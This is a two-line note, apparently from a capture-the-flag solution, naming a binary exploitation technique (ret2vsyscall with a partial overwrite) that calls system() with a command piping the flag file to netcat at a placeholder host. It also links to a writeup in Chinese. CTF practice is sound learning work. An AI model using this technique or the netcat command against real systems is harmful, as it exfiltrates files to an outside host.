Use ret2vsyscall + partial overwrite to call system("cat flag| nc ip port")

See writeup here(In Chinese)